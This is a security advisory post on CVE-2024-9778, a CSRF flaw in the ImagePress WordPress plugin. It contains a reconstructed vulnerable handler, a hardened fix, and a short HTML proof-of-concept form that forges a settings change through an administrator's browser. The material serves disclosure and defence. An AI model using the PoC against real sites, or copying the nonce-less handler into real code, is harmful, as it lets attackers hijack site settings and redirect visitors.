The ImagePress – Image Gallery plugin for WordPress, a widely used plugin for building image galleries, is vulnerable to Cross-Site Request Forgery (CSRF) in all versions up to, and including, 1.2.2. The cause is missing or incorrect nonce validation in the 'imagepress_admin_page' function. Unauthenticated attackers can therefore update plugin settings, including redirection URLs, via a forged request, provided they can trick a logged-in site administrator into performing an action such as clicking a crafted link or visiting a page they control.

In this post we look at CVE-2024-9778 in detail: the code pattern responsible for the vulnerability, links to the original references, and exploit details. Site administrators should understand and address this issue before their sites are targeted.

Code Snippet

The following simplified snippet illustrates the vulnerable pattern in the 'imagepress_admin_page' function (it is a reconstruction of the pattern, not the plugin's verbatim source): the POST handler writes the submitted settings straight into the options table without verifying any nonce.

<?php
function imagepress_admin_page() {
    // The handler trusts any POST carrying this field, from any origin.
    if ( isset( $_POST['save_imagepress_options'] ) ) {
        // Saves settings with no check_admin_referer() / wp_verify_nonce() call.
        update_option( 'imagepress_options', $_POST );
    }
    ?>
    <form method="post" action="">
        <!-- settings_fields() emits a Settings API nonce, but the handler
             above never verifies it, so it provides no CSRF protection. -->
        <?php settings_fields( 'imagepress-settings-group' ); ?>
        <?php do_settings_sections( 'imagepress-settings-group' ); ?>
        ...
        <input type="submit" name="save_imagepress_options" value="<?php _e( 'Save Changes' ); ?>" />
    </form>
    <?php
}

As the snippet shows, 'imagepress_admin_page' processes the POST request and updates the plugin's settings without verifying a nonce. That is the whole CSRF condition: the attacker cannot send the request themselves (they have no session), but any page they control can make a logged-in administrator's browser send it, and the browser attaches the administrator's WordPress authentication cookies automatically. Because nothing ties the request to a form the administrator actually loaded, the server accepts it.
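As an added example (not code from the plugin or its author), here is a hardened version of the illustrative handler above. It applies the two controls the page discusses, nonce verification and least privilege, and also stops storing the raw $_POST array. The function name prefix 'ip_', the nonce action/field names and the option keys 'redirect_url' and 'gallery_title' are assumptions for the example.

```php
<?php
// Added example: hardened settings handler. Names prefixed "ip_", the nonce
// action "ip_save_options", and the option keys are assumptions for this example.

function ip_admin_page() {
    // Least privilege: only users allowed to manage options reach this handler.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( esc_html__( 'You do not have permission to access this page.' ) );
    }

    if ( isset( $_POST['save_imagepress_options'] ) ) {
        // CSRF defence: verifies the nonce emitted by wp_nonce_field() below.
        // A forged cross-site POST cannot carry a valid nonce for this user and
        // action, so check_admin_referer() calls wp_die() and nothing is saved.
        check_admin_referer( 'ip_save_options', 'ip_options_nonce' );

        // Never store $_POST wholesale: copy only known keys after sanitising.
        $current = (array) get_option( 'imagepress_options', array() );
        $clean   = array();

        $url = isset( $_POST['redirect_url'] )
            ? esc_url_raw( wp_unslash( $_POST['redirect_url'] ) )
            : '';
        // Only accept http(s) redirect targets; reject javascript:, data:, etc.
        $scheme = wp_parse_url( $url, PHP_URL_SCHEME );
        if ( ! in_array( $scheme, array( 'http', 'https' ), true ) ) {
            $url = '';
        }
        $clean['redirect_url'] = $url;

        $clean['gallery_title'] = isset( $_POST['gallery_title'] )
            ? sanitize_text_field( wp_unslash( $_POST['gallery_title'] ) )
            : '';

        update_option( 'imagepress_options', array_merge( $current, $clean ) );
        echo '<div class="notice notice-success"><p>'
            . esc_html__( 'Settings saved.' ) . '</p></div>';
    }

    $opts = (array) get_option( 'imagepress_options', array() );
    ?>
    <form method="post" action="">
        <?php
        // Emits hidden fields "ip_options_nonce" (the nonce) and "_wp_http_referer".
        wp_nonce_field( 'ip_save_options', 'ip_options_nonce' );
        ?>
        <p>
            <label for="redirect_url">Redirect URL</label>
            <input type="url" id="redirect_url" name="redirect_url"
                   value="<?php echo esc_attr( $opts['redirect_url'] ?? '' ); ?>" />
        </p>
        <p>
            <label for="gallery_title">Gallery title</label>
            <input type="text" id="gallery_title" name="gallery_title"
                   value="<?php echo esc_attr( $opts['gallery_title'] ?? '' ); ?>" />
        </p>
        <input type="submit" name="save_imagepress_options" class="button button-primary"
               value="<?php esc_attr_e( 'Save Changes' ); ?>" />
    </form>
    <?php
}
```

Two points worth noting. WordPress nonces are bound to the logged-in user and to the action string, so a nonce harvested from one site or user is useless against another; that is why the forged form in the exploit section cannot supply one. And the nonce check is not an authorisation check: check_admin_referer() only proves the request came from a form this user loaded, which is why the capability check stays as a separate first line.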

Original References

1. WordPress.org Plugin Repository - ImagePress: https://wordpress.org/plugins/imagepress/
2. CVE-2024-9778: Cross-site request forgery (CSRF) vulnerability in ImagePress: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-9778
3. ImagePress – Image Gallery Plugin Security Advisory: https://wpvulndb.com/vulnerabilities/9778

Exploit Details

An attacker exploits this CSRF vulnerability by hosting a page, or sending a link to one, that contains a form targeting the vulnerable 'imagepress_admin_page' handler. When a logged-in site administrator visits the page and submits the form (or the page submits it for them), the browser sends the forged POST together with the administrator's session cookies. The attacker can then update plugin settings, including modifying redirection URLs to point at malicious websites or other unwanted content.

Here is a simple example of an exploit using an HTML form (the admin page slug in the action URL is a placeholder that would need to match the plugin's registered menu slug):

<!DOCTYPE html>
<html>
<head>
    <title>CVE-2024-9778 - CSRF Exploit POC</title>
</head>
<body>
    <h1>ImagePress – Image Gallery Plugin CSRF Exploit</h1>
    <!-- Posts to the settings page; the browser attaches the victim's cookies. -->
    <form method="post" action="http://targetsite.com/wp-admin/admin.php?page=imagepress_admin_page">
        <input type="hidden" name="imagepress_setting_name" value="malicious_value" />
        <!-- The handler only acts when this field is present in the POST body. -->
        <input type="submit" name="save_imagepress_options" value="Submit!" />
    </form>
</body>
</html>

In this example, the attacker's page contains an HTML form whose hidden fields correspond to the plugin settings, with the original values replaced by malicious ones. If the site administrator clicks the submit button, the browser sends a POST request to the targeted site carrying the administrator's authentication cookies, and because the handler never checks a nonce, the plugin settings are updated without the administrator's knowledge. Some browsers now treat cookies lacking a SameSite attribute as Lax and withhold them on cross-site POST navigations, which may block this particular form in some cases, but that behaviour varies by browser and is not a substitute for server-side nonce verification.

Conclusion

CVE-2024-9778 highlights the importance of nonce validation in protecting against CSRF attacks. Unauthenticated attackers can exploit this vulnerability by tricking site administrators into performing actions, such as clicking maliciously crafted links, and thereby change the plugin's settings, including where visitors are redirected, potentially causing serious harm to a website.

Site administrators running ImagePress – Image Gallery in any version up to and including 1.2.2 should update to a later, patched version as soon as possible to mitigate this vulnerability. Plugin developers should verify a nonce (wp_nonce_field() paired with check_admin_referer() or wp_verify_nonce()) on every state-changing request, check the caller's capability separately, and follow the principle of least privilege, which will help prevent similar vulnerabilities in the future.

Timeline

Published on: 10/12/2024 06:15:03 UTC
Last modified on: 10/15/2024 12:57:46 UTC